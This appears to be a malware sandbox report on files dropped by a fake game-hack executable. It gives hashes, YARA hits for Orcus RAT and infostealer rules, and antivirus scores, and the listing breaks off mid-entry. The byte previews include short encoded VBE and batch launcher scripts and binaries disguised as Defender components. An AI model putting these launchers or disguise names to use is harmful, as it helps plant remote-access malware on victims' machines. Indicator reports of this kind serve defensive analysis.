                                    SHA-256:C60F74F6E164049E683A5F01B8CFEA24AA85CBF6C7B31B765CBAD16D8AB0D7B2
                                    SHA-512:34421A517F5F1909AFD694D24E22CAFAD9930725DF964BA9C80666E9F0F2DCFDD2A254DCF6699E5797296EC3AE611593563779DF05E3A617C7F8679A154DFD37
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 84%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.d.................p/.........../.. ........@.. ......................../...........`.................................L./.O...../......................./...................................................... ............... ..H............text....o/.. ...p/................. ..`.rsrc........./......r/.............@..@.reloc......../......./.............@..B................../.....H.......xk*..#.............0.'..........................................(....*6.(.....(....*R..(.....{....o....&*z.,..{....,..{....o......(....*....0..V............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(.....{.....o.....{...... ....s....o.....{....r...po.....{.....S..s....o.....{.....o.....{....r...po.....{.....o.....{.....o.....{....r!..p"..@A...s....o.....{.....) .... ....(....o.....{........s....o.....{....r3..po.....{.... ......s..

                                    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):4796928
                                    Entropy (8bit):7.999957858848529
                                    Encrypted:true
                                    SSDEEP:98304:s61/dl9EOCUWXid3GVg3T+QOov7ASFoSQXz0xfmxg99O4LvFLuPkNv:s8/vWOCFidWo+QOovFFoJXz0Bt99OGvH
                                    MD5:E8C32CC88DB9FEF57FD9E2BB6D20F70B
                                    SHA1:E732B91CD8AC16FA4CE8AD9E639BF21D69F6BB45
                                    SHA-256:F787CE198538B1C0B2BFCE8CE5297E34152CF6DEEBE559DF6887F65C72A081A4
                                    SHA-512:077307D42438F2B72D62CE9E35C67C09E1375C2E203E6D6D455C6C8861C6442B3D82F1345B6C76940F5E8015FE93491158A59B102FABD139C742D75C2C42BA7A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 58%
                                    Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...........&...."......"...........0........@..............................@............ ... ..............................................0................k.....................................................................(0...............................MPRESS1. .......$I......................MPRESS2.....0.......&I....................................................................................................................v2.19..`#I. ...........p:...y..W....k].K@e>J..|U.x+I...Rs.H..g}...<(d@;..wyzf.P..8..k'..0._k..l.....og..........f....K...c....<.*k..K..5..h..=&...I....C5!D.,...|..7h.........t9I..P..0B8..'mt..M.....<&P...e.....R{.0.M...p..r.}.|.=J.V..JR.....BG.w:0(AI'.......?)<*3.]..E..U.O..Jp.."..!.8s..+.d8x).d.....<..Qf.T.I..?,.S..Y.q.T......$.~s#.Q...-..U...].....>..Z&Iv.....Z[.;pnu\......r)V".a.QX^OC..?. Q...C}:2.Q.....w...^Y~.Z.tw/;..i;6>..>;5y..9....k.....l..U.}/x=.z.,4U(..

                                    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe

                                    Download File
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):263
                                    Entropy (8bit):5.990912287621547
                                    Encrypted:false
                                    SSDEEP:6:GWwqK+NkLzWbH9WF08nZNDd3RL1wQJRZ7tUAKh9s4U/LKVShDwPtxs:GbMCzWL74d3XBJr7shW/qqwPtxs
                                    MD5:A05E26D89C5BE7E2C6408B09CD05CF74
                                    SHA1:C24231C6301F499B35441615B63DB6969A1762FD
                                    SHA-256:05628DFFF22E15B219A711CF52A2C87521170853979F00FCD014CF164656418E
                                    SHA-512:8C8733F12DD71CFAFD2EDBFAD487279D6ED971EB119B1CDE92A905F4658A9B090F831F42EF2228A4F6C64071A1F54FB74708438B4361E317E36016897577913D
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^7gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zqk.]E.Yr:.nn.6HW.rYKDzJ9C9DYGtXcJ/sWCYgt\.\9GqX2hnX|.o!U8.)onymN\HZno..Bp5wtOj6.c8lDJ~,TSP6l^/n/k0AAA==^#~@.

                                    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                    C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3115520
                                    Entropy (8bit):7.863824279295955
                                    Encrypted:false
                                    SSDEEP:49152:43X27p1EZKMnkmWg8LX5prviYDyKS5AypQxbRQAo9JnCmpEu/nRFfjI7L0qb:4WHTPJg8z1mKnypSbRxo9JCm
                                    MD5:10E817A4D5E216279A8DE8ED71C91044
                                    SHA1:97C6FB42791BE24D12BD74819EF67FA8F3D21724
                                    SHA-256:C60F74F6E164049E683A5F01B8CFEA24AA85CBF6C7B31B765CBAD16D8AB0D7B2
                                    SHA-512:34421A517F5F1909AFD694D24E22CAFAD9930725DF964BA9C80666E9F0F2DCFDD2A254DCF6699E5797296EC3AE611593563779DF05E3A617C7F8679A154DFD37
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 84%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.d.................p/.........../.. ........@.. ......................../...........`.................................L./.O...../......................./...................................................... ............... ..H............text....o/.. ...p/................. ..`.rsrc........./......r/.............@..@.reloc......../......./.............@..B................../.....H.......xk*..#.............0.'..........................................(....*6.(.....(....*R..(.....{....o....&*z.,..{....,..{....o......(....*....0..V............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(.....{.....o.....{...... ....s....o.....{....r...po.....{.....S..s....o.....{.....o.....{....r...po.....{.....o.....{.....o.....{....r!..p"..@A...s....o.....{.....) .... ....(....o.....{........s....o.....{....r3..po.....{.... ......s..

                                    C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe.config

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):357
                                    Entropy (8bit):5.044876050355283
                                    Encrypted:false
                                    SSDEEP:6:TMVBd1IffVKNC7VJdfEyFRdSC7VrfC7VNQfC7VOVx/OfEyFRfyruUuAW4QIT:TMHdG3VOcrdS+QmafyV93xT
                                    MD5:A2B76CEA3A59FA9AF5EA21FF68139C98
                                    SHA1:35D76475E6A54C168F536E30206578BABFF58274
                                    SHA-256:F99EF5BF79A7C43701877F0BB0B890591885BB0A3D605762647CC8FFBF10C839
                                    SHA-512:B52608B45153C489419228864ECBCB92BE24C644D470818DFE15F8C7E661A7BCD034EA13EF401F2B84AD5C29A41C9B4C7D161CC33AE3EF71659BC2BCA1A8C4AD
                                    Malicious:true
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. <supportedRuntime version="v4.0.30319" sku=".NETFramework,Version=v4.0,Profile=Client" />.. </startup>..</configuration>

                                    C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):48
                                    Entropy (8bit):4.256328385912463
                                    Encrypted:false
                                    SSDEEP:3:B9lcTBtGQv0X+MpAEn:BMttfGn
                                    MD5:2FA8DECC3DAFE6F196F6C28769192E7C
                                    SHA1:69F4E0CF41B927634A38B77A8816CA58C0BFB2DE
                                    SHA-256:7E40EB542D164397C0BF17A47C8F0DB79E7028299E9F180D38505220FD2CFB30
                                    SHA-512:C9FB6C2AC2441FF14673CCAA3F1D5E703356C093353992D302D34DF6C9E26A85ABA6760C3B98F0CD0ADA45183C55B2E5CABC09978CA084077DD71743CA9FDBC1
                                    Malicious:false
                                    Preview:"%AppData%\chainReviewdhcp\containerRuntime.exe"

                                    C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):227
                                    Entropy (8bit):5.841796052941854
                                    Encrypted:false
                                    SSDEEP:6:GavwqK+NkLzWbH9WF08nZNDd3RL1wQJRZ7rRXN9id:Ga2MCzWL74d3XBJr7rzE
                                    MD5:D47062C8738A534FC931C0F341A61773
                                    SHA1:C1175037A0E96363DA56BC9D8ABDB726CDDC74FC
                                    SHA-256:484CC22B88E1EAAE619F948E96812EBF70275F9E6408E2E3DBD8AF827AC5199A
                                    SHA-512:9DE6DCF7944EC9F2FF44C8FDBE562A6755C2AF9800028B01FB0969921E6EF969C1ECC6E2AB129F191AC5FEEAA9AA30CF436489DFEE8E94433D6678A9942FFE39
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^ygAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]z1tmrx"+-k.h[41wzdBDNjv~4)N+tt/eF;Alts &Tw294 (lYES,!SP6C^/nQUAAAA==^#~@.

                                    C:\Users\user\Desktop\BpJZMyRc.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32768
                                    Entropy (8bit):5.645950918301459
                                    Encrypted:false
                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\ErvIhhWY.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):24064
                                    Entropy (8bit):5.492504448438552
                                    Encrypted:false
                                    SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                    MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                    SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                    SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                    SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 33%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\PxMOoBdB.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\QLuoYXmy.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):28160
                                    Entropy (8bit):5.570953308352568
                                    Encrypted:false
                                    SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                    MD5:A4F19ADB89F8D88DBDF103878CF31608
                                    SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                    SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                    SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 4%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\WmQvmhxk.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\brpMezGb.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\jdhUscxN.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.529329139831718
                                    Encrypted:false
                                    SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                    MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                    SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                    SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                    SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 3%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\mOMkzqHG.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\syFrxmlp.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 38%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\wowiEjmi.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):22016
                                    Entropy (8bit):5.41854385721431
                                    Encrypted:false
                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
